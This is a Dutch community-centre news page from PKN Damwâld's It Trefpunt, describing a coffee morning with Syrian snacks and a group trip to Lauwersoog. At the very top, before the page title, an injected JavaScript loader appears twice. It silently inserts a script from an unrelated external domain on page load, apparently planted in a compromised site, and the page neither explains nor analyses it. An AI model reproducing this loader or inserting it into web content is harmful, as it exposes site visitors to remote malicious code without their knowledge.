;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Laatste nieuws It Trefpunt - PKN Damwâld

Laatste nieuws It Trefpunt

Gepubliceerd op: dinsdag 2 juli 2019

Syrische hapjes

Tijdens de inloopochtend op donderdag op 20 juni waren er voor iedereen bijzondere traktaties voor bij de koffie. Onze vrijwilliger Faten, afkomstig uit Syrie, had toegezegd om lekkere hapjes klaar te maken zodat wij eens iets van een andere cultuur konden proeven. Faten is de dag ervoor bijna de hele dag bezig geweest nadat ze eerst alle benodigdheden in een speciale winkel had gekocht. En de resultaten waren geweldig: veel schalen vol verschillende hapjes en die werden gretig naar binnen gewerkt door de ruim 30 aanwezigen. Er bleven nog hapjes over, maar die zijn ook goed terecht gekomen. Namens de organisatie en vooral ook namens alle aanwezigen, willen wij Faten hartelijk danken voor alle moeite en de lekkere hapjes. Helaas is er maar 1 foto en die is van de bereiding.

Uitje 

Op 26 juni was de eerste gepland van de mogelijk nog vele extra activiteiten. Op woensdagmiddag rond 13.45 vertrokken 6 auto’s vol deelnemers met op programma: bezoek aan het Fiskerhuske, daarna koffie/thee/fris onderweg en bezoek aan de haven van Lauwersoog met afsluitend eten in restaurant Schierzicht. Op de dag ervoor vielen de mussen nog dood van het dak door de hitte en stond de organisatie voor een dilemma van wel of niet door laten gaan. Gelukkig was het weerbericht van Piet zoals altijd erg betrouwbaar en kwam de voorspelde noordenwind met afkoeling uit en het uitje niet in gevaar. Het Fiskerhuske was vooraf ingelicht en wij werden daar in 2 groepen verdeeld en keurig begeleid en ingelicht over alles wat er te bekijken valt inclusief een film van ongeveer 10 minuten. Het was bijzonder interessant en viel zichtbaar in de smaak. Vervolgens koers gezet naar Lauwersoog waarbij wij halverwege die rit een stop op een mooie plek hadden ingelast om iets te drinken. Grote verassing daarbij was de door Pietje Boersma (sinds het begin vrijwilliger bij It Trefpunt) zelfgemaakte cake met daar bovenop lekkere vruchten. Velen maakten even de overstap naar de andere kant van de weg en de dijk om de vele kite surfers in actie te zien. Die acties waren zeer spectaculair, maar nodigden niet uit om zelf even te proberen. De volgende halte was Lauwersoog en in Schierzicht waren 6 tafels van 4 voor ons gereserveerd bij het raam met prachtig zicht op de bedrijvigheid in de haven.  In overleg met de bediening kon iedereen zelf bestellen en afrekenen waarna het bestelde per persoon bij onze tafels werd gebracht. Dit ging allemaal zeer voortvarend en spoedig waren we bezig patat, salade, vis, kibbeling of iets anders naar binnen te werken met daarbij een drankje. Toen was het tijd om naar huis te gaan en kwam rond 18.15 uur een einde aan een hele mooie middag die prima verliep door een opperbeste stemming bij iedereen en juiste samenwerking met het Fiskerhuke en Schierzicht. Dank aan deelnemers, vrijwilligers, chauffeurs en niet in de laatste plaats aan onze cake bakster (kan zo meedoen aan Heel Holland …..)